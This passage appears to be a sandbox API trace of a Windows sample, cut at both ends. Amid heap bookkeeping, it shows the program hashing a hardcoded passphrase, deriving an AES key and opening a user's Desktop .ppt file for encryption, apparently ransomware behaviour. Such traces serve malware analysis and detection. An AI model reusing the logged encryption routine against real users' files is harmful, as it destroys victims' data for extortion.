hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.895] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0120.895] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0120.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.896] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0120.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0120.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0120.898] CloseHandle (hObject=0x2a0) returned 1 [0120.898] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.898] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0120.898] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\aZ 2dgF6.ppt", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58249d20, ftCreationTime.dwHighDateTime=0x1d5e324, ftLastAccessTime.dwLowDateTime=0xae133060, ftLastAccessTime.dwHighDateTime=0x1d5ea64, ftLastWriteTime.dwLowDateTime=0xae133060, ftLastWriteTime.dwHighDateTime=0x1d5ea64, nFileSizeHigh=0x0, nFileSizeLow=0xbc9f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="aZ 2dgF6.ppt", cAlternateFileName="AZ2DGF~1.PPT")) returned 0x41ac500 [0120.898] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0120.898] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.898] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.899] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0120.899] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0120.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0120.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0120.899] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0120.900] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0120.900] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.900] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0120.900] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.900] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.900] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.900] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.900] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.900] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0120.900] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0120.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0120.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0120.900] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0120.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0120.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0120.900] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.900] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0120.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca8f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0120.901] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0120.901] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.901] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.901] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0120.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca7c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0120.901] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac100) returned 1 [0120.901] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.901] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0120.901] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0120.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0120.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0120.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0120.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0120.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0120.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0120.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0120.902] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0120.902] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0120.902] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0120.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0120.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0120.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0120.903] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aZ 2dgF6.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\az 2dgf6.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0120.903] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.903] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0120.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0120.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0120.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0120.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.903] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 